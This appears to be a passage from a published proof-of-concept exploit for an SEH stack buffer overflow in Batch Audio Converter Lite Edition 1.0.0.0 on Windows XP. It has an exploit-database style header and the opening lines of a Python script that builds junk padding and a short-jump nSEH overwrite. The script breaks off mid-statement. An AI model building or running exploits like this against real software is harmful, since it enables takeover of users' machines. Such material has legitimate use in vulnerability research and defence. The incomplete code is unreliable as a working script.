# Exploit Title: Batch Audio Converter Lite Edition <= v1.0.0.0 Stack Buffer Overflow (SEH) # Date: 06/17/2010 # Author: modpr0be # Software Link: http://www.freesoftwaretoolbox.com/files/batchaudio_setup.exe # Version: <=1.0.0.0 (0.4.0.0 tested and worked) # Tested on: Windows XP SP2 # Type of Vuln: SEH # CVE : [N/A] # Code : bacon-exploit.py # Greetz: Otoy, Postnix, Jasakom Community, Kilurah, Gesang, dan wedus-wedus lainnya ^^ # Thanks: All OffSec member #!/usr/bin/python import struct junk = "A" * 4132 nseh = "\xeb\x06\x90\x90" seh = struct.pack('